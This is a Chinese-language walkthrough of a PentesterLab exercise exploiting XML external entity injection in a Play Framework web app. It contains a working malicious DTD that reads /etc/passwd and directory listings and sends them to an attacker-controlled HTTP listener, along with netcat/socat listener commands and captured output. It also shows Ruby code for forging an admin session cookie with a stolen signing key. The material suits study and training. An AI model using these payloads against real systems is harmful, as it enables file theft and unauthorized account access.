本渗透测试练习提供专门的练习平台,大家可以在pentesterLab中下载VM镜像,还可以读一下原文英文教程。

介绍

本课程在只用框架中描述了XML entity漏洞的利用,这个漏洞可以的达到在任意目录检索任意的文件和列表的目的。

有趣的是,这个bug是完全透明的,并可可以很长时间都没有被发现。对这个bug进行黑盒测试,你需要知道你想要寻找的目录或者文件,如果你想不看教程试试自己的本领,当然可以,但是还是建议你先看这里的(英文且需要翻墙)。

Play Framework

这个渗透框架是一个web的框架,在这个框架中,开发者可以快速的使用java或者scala编译开发web应用。这样可以有序管理代码,并且url可以像Ruby-on-Rails一样被映射。

就像Ruby-on-Rails,当收到Http请求时,Play框架管理多种文本类型。因此应用会非常简单并且与XML文件没有关联,这仅仅是一个登陆页面。然而,既然Play框架可以自动解析XML请求,我们就能使用这个bug去读取任意的文件。 

缺点:

当解析xml文件时,最重要的安全检查就是确保xml Entity不可用,XML实体可以告诉XML解析器去匹配特定内容:

1. 从文件系统
2. 从web服务器(HTTP,HTTPS)
3. 或者从一个FTP服务器上

这显然可以被攻击者利用来查看应用上的敏感的信息(比如路径,密码,源代码等等)

Exploition

我们如何来利用这个漏洞呢?请看下图!

我比较喜欢的方法(这个是一个黑盒测试),有四个相邻的终端。

1. 第一个终端:发送初始化请求。(step1)

2. 第二个终端:发送DTD。(step2&3)

3. 第三个终端:浏览被发送到服务器上的信息。

4. 第四个终端:调试

初始化请求—第一步

首先,我们需要发送一个正确的http请求,最简单的方法就是写一个小脚本去连接服务器。然而我们并需要管回复,但是我们仍然可以所以目标。你可以使用代理或者手动netcat来做。但是如果你用netcat的话就需要手动设置Centen-Length Header的长度了。

初始化信息的请求必须是POST请求,这样可以确保框架可以解析请求包。在这个web应用中,我们尝试登录的时候,一个这样的POST消息就发送出去了。

我们需要修改这个请求来发送XML,这样我们就需要做下面的工作。

1. 删掉没用的东西

2. 在消息包中添加XML信息。

3. 改变Centent-Type字段(大家都知道这是要干嘛的喔)

于是我们就改成了如下的样子:

POST /login HTTP/1.1
Host: vulnerable
Connection: close
Content-Type: text/xml
Content-Length: 97
 
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://192.168.159.1:3000/test.dtd">
<foo>&e1;</foo>
本地DTD:http://192.168.159.1:3000/test.dtd

现在我们有了想要发送的数据包(包含XML),我们可以把它发送到服务器了,如果进行的顺利的话,服务器将会相应一个400错误,因为不能索引DTD。

Serving the DTD

为了使用DTD或者其他的文件,我们需要一个web服务器,这可以在任何一台服务器上做到,然而你将需要能看见是否服务器取回DTD。在真实的场景中,目标服务器也许不能进入你自己的的服务器,所以你得有办法解决这个问题:

最简单的办法就是:

1.在前台Run一个小型的web服务器。我个人比较喜欢使用webrisk,并且留一个Shell来随时启动web服务器。

Bash:alias web="ruby -rwebrick -e's=WEBrick::HTTPServer.new(:Port => 3000, :DocumentRoot => Dir.pwd);
trap(\"INT\"){s.shutdown};s.start'"

2.运行web服务器的同时使用tail –f来列出收到的每一个请求。

如果你使用了上面的别名,不出意外你能看到下面这些东西:

% web
[2015-03-31 08:19:28] INFO  WEBrick 1.3.1
[2015-03-31 08:19:28] INFO  ruby 1.9.3 (2012-12-25) [x86_64-darwin12.2.1]
[2015-03-31 08:19:28] WARN  TCPServer Error: Address already in use - bind(2)
[2015-03-31 08:19:28] INFO  WEBrick::HTTPServer#start: pid=6028 port=3000

如果你成功了,记得检查一下你使用浏览器来看你的web网页的时候下面的log出现在shell中:

localhost - - [31/Mar/2015:08:20:46 AEDT] "GET /test.dtd HTTP/1.1" 200 153
http://localhost:3000/ -> /test.dtd

使用下面的DTD,这样就能强制发送给你这些消息了:

<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.159.1:3001/BLAH?%p1;'>">
%p2;

这个DTD将会强迫XML解析器读取/etc/passwd中的内容并且把它的值传给p1. 然后接着创造另一个变量p2,这个变量将会包含一个含有p1的值恶意连接。然后使用%p2打印p2的值,这样,在解析了DTD的时候,你就会看到这个东西了:

<!ENTITY e1 SYSTEM 'http://192.168.159.1:3001/BLAH?[/etc/passwd]'>

[/etc/passwd]这里面的内容就是/etc/passwd中的内容。我们回顾一下我们刚开始发送的数据包。数据包包含了一个索引:e1: <foo>&e1;</foo>

一旦服务器完成DTD过程,就回释放掉到e1的索引,并且发送/etc/passwd到你的服务器上。

第五步,浏览信息

最后我们需要接受信息,我们可以这样来做:

1. netcat –l –p 3001 但是你每次进入TCP端口时都需要重启进程。
2. socat TCP-LISTEN:3001,reuseaddr,fork – 这条命令让第一条请求到达之后端口不被关掉,并且阻塞后面的进程。

于是,现在万事俱备了!

 

看右上角,密码已经出现了!

GET /BLAH?root:x:0:0:root:/root:/bin/sh%0Alp:x:7:7:lp:/var/spool/lpd:/bin/sh%0Anobody:x:65534:65534:nobody:/nonexistent:/bin/false%0Atc:x:1001:50:Linux%20User,,,:/home/tc:/bin/sh%0Apentesterlab:x:1000:50:Linux%20User,,,:/home/pentesterlab:/bin/sh%0Aplay:x:100:65534:Linux%20User,,,:/opt/play-2.1.3/xxe/:/bin/false%0Amysql:x:101:65534:Linux%20User,,,:/home/mysql:/bin/false%0A HTTP/1.1
User-Agent: Java/1.7.0-internal
Host: 192.168.159.1:3001
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

那么接下来,我们来谈谈如何在互联网中探测这种漏洞:

首先,在互联网中我们不能保证服务器允许回连。为了寻找这种漏洞(并且服务器解析了外部名),你可以使用DNS。 

为了达成目的,你只需要安装一个DNS服务来检测log就可以了,然后你可以使用XML Entity来指向你的域名:例如http://rand0m123.blahNaNl.io,把信息发送出去。如果这个服务器有这种漏洞(可以解析外部DNS名),你将会看到来自你的目标的DNS解析请求。

寻找私密URL:

现在一切正常,我们需要寻找到私密URL,Play框架使用一个route文件来寻找那些可用的URL。我们需要找到这个文件来得到私密URL。

一般方法就是去找应用的位置。我们可以尝试读取/proc/self/environ这个目录。然而,这些许并没有什么卵用。因为XML解析器不能读proc下面的文件(可能是因为使用了DataInputStream)

如果我们想使用老办法/etc/passwd,并且把它URL编码,我们就会看到Play User显示:

% irb
1.9.3-p362 :001 > require 'uri'
 => true
1.9.3-p362 :002 > puts URI.decode("GET /BLAH?root:x:0:0:root:/root:/bin/sh%0Alp:x:7:7:lp:/var/spool/lpd:/bin/sh%0Anobody:x:65534:65534:nobody:/nonexistent:/bin/false%0Atc:x:1001:50:Linux%20User,,,:/home/tc:/bin/sh%0Apentesterlab:x:1000:50:Linux%20User,,,:/home/pentesterlab:/bin/sh%0Aplay:x:100:65534:Linux%20User,,,:/opt/play-2.1.3/xxe/:/bin/false%0Amysql:x:101:65534:Linux%20User,,,:/home/mysql:/bin/false%0A HTTP/1.1")
GET /BLAH?root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
play:x:100:65534:Linux User,,,:/opt/play-2.1.3/xxe/:/bin/false
mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false

这个user的home文件夹位于/opt/play-2.1.3/xxe/,因此这里面一定有我们需要的东西。

因为XML解析器的不同,我们有可能解析到一个目录列表。唯一的方法就是去尝试!!!接下来我们把DTD文件指向/opt/play-2.1.3/xxe/:

<!ENTITY % p1 SYSTEM "file:///opt/play-2.1.3/xxe/">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.159.1:3001/BLAH?%p1;'>">
%p2;

接下来我们就能看到下面的内容了:

GET /BLAH?.gitignore%0A.settings%0Aapp%0Aconf%0Alogs%0Aproject%0Apublic%0AREADME%0ARUNNING_PID%0Atarget%0Atest%0A HTTP/1.1

解码结果如下:

GET /BLAH?.gitignore
.settings
app
conf
logs
project
public
README
RUNNING_PID
target
test
 HTTP/1.1

这样我们就可以找到conf/routes。一旦你成功查看了routes文件,你就能可以进入秘密URL了。

干预Session:

另一个Play application重要的文件就是application.conf,这个文件包含了登陆session的密码。这个文件通常在conf文件夹中,一旦你拥有这个文件,你就可以轻易的登陆了。 

首先,你需要拿到conf/application.conf这个文件(使用教程提供的方法),然后你需要使用这个文件来伪造session,为了做到这一点我们需要了解一下session都有些什么东西。我们可以拿到application的源代码,来理解登陆逻辑。 

基于conf/routes文件,我们知道java中的方法:controlers.Application.login在我们提交表单的时候被调用。一般来说这个源码在app/controllers/Application.java中(或者.scala)。 

一旦我们拿到了controller的元大吗我们就可以看到session是如何被管理的,例如下面的代码:

      User user = User.findByUsername(username);
      if (user!=null) {
          if (user.password.equals(md5(username+":"+password) )) {
            session("user",username);
            return redirect("/");

我们将使用admin给user赋值来伪造一个session。 

如果了解过Play Session Inject(url贴上)的话,你就会惊奇的发现Play的session内部已经改变了。

以前是这样的
signature-%00name1:value1%00%00name2:value2%00
在这个Play的版本中
signature-name1=value1&name2=value2

代码用法在framework/src/play/src/main/scala/play/api/mvc/Http.scala中:

    def encode(data: Map[String, String]): String = {
      val encoded = data.map {
        case (k, v) => URLEncoder.encode(k, "UTF-8") + "=" +
URLEncoder.encode(v, "UTF-8")
      }.mkString("&")
      if (isSigned)
        Crypto.sign(encoded) + "-" + encoded
      else
        encoded
    }

我们需要添加变量user=admin
最后我们可以登陆这个session,源代码如下:

  def sign(message: String, key: Array[Byte]): String = {
    val mac = Mac.getInstance("HmacSHA1")
    mac.init(new SecretKeySpec(key, "HmacSHA1"))
    Codecs.toHexString(mac.doFinal(message.getBytes("utf-8")))
  }

在Ruby中,我们可以这样使用:

KEY = "[KEY FOUND IN conf/application.conf]"
def sign(data)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, KEY,data)
end

最后一步就是知道session的cookie名,既然可以在conf/application.conf中被改变,默认的名字就是PLAY_SESSION.在浏览器中设置这些cookie之后,我们可以看见我们作为admin已经登陆了。

结论
这个练习教我们如何使用Play框架中的XML entity的漏洞。这个漏洞相当有趣,因为它以一种和开发者完全相反的方式去影响Play框架。

* 作者:VillanCh,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

源链接

Hacking more

...